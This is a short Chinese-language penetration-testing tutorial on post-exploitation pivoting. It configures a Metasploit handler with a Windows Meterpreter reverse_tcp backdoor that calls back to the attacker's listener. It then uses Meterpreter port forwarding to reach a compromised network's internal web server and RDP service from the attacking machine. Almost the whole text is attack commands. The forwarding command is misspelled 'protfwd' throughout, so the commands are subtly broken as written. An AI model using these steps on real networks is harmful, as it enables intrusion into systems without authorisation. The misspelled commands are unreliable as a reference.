内网渗透之——端口转发与端口映射
首先在msf生成后门使用exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.115
set lport 12345
端口映射:
protfwd --help
通过访问本机的2020端口访问数据服务器的80端口
在攻击主机执行protfwd add -L 192.168.0.115 -l 2020 -p 80 -r 10.10.10.128
在攻击主机执行firefox http://192.168.0.115:2020来访问目标主机80端口
转发端口:
通过访问本机的5555端口来访问目标主机的3389端口
protfwd add -l 5555 -p 3389 -r 192.168.0.149
在攻击主机执行 rdesktop 127.0.0.1:5555连接目标主机
查看列表: protfwd list
清空列表: protfwd flush